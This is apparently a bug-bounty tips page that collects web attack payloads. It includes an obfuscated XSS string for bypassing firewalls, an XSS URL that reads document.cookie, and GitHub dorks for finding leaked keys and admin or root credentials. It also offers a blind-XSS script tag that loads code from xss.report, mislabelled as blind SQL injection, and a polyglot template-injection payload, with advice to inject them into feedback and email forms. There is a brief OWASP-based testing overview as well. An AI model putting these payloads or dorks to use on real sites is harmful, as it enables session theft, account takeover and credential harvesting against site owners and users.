Bug bounty Tips

A payload to bypass WAF, published by @akaclandestine <detalhes%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%230000000000000000041//

## Payload :- https://help[.]something[.]com/?search=%22%3E%3Csvg%2Fonload=confirm(document.cookie)%3E ## Tips :- nuclei -l live-subs.txt -t /root/nuclei-templates/http/vulnerabilities/generic/t top-xss-params.yaml

Find lot of bugs using this dorks in github "Target.com" language:yml "Target. com" language:yml "_key" "Target. com" language:yml "admin" "Target. com" language:yml "root" "Target. com" language:yml "host

Bug: Blind SQli Payload: ';"/></textarea></script><script/src=//xss.report/c/username></script> Inject your payload in these forms. Submit Feedback Contacts us Join Our Waitlist Customer Support check if email field type="text" <input type="text" name="email"> then inject payload in Email field

\u0022: Represents a double quote ("). \u003c: Represents a less-than sign (<). %26quot;: Represents the HTML entity for a double quote ("). %26gt;: Represents the HTML entity for a greater-than sign (>). %26lt;: Represents the HTML entity for a less-than sign (<). ';}};“>${{7*7}}: Contains JavaScript code designed to execute when the payload is injected and the page is loaded. The code includes closing the current script tag (), injecting an image tag with an onerror attribute that triggers an alert, and then a simple arithmetic expression ${{7*7}} that evaluates to 49.

\u0022\u003c%26quot;%26gt;%26lt;"';}};“>${{7*7}} My favourite xss payload

🔥First Step Toward Web Application Testing : 😎 We will always come across various web applications that are designed and configured differently. One of the most current and widely used methods for testing web applications is the https://github.com/OWASP/wstg/tree/master/document/4-Web_Application_Security_Testing. ❄️ One of the most common procedures is to start by reviewing a web application's front end components, such as HTML, CSS and JavaScript (also known as the front end trinity), and attempt to find vulnerabilities such as Sensitive Data Exposure { https://owasp.org/www-project-top-ten/2017/A3_2017-Sensitive_Data_Exposure } and Cross-Site Scripting (XSS) { https://owasp.org/www-project-top-ten/2017/A7_2017-Cross-Site_Scripting_(XSS) } . 🌓 Once all front end components are thoroughly tested, we would typically review the web application's core functionality and the interaction between the browser and the webserver to enumerate the technologies the webserver uses and look for exploitable flaws. We typically assess web applications from both an unauthenticated and authenticated perspective (if the application has login functionality) to maximize coverage and review every possible attack scenario. ✨

How to Submit Vulnerabilities, Writing a Great WriteUp and 2 years of Bug Bounty https://blog.intigriti.com/2023/11/22/bug-bytes-217-how-to-submit-vulnerabilities-writing-a-great-writeup-and-2-years-of-bug-bounty/

226 - A Heap of Linux Bugs https://dayzerosec.com/podcast/226.html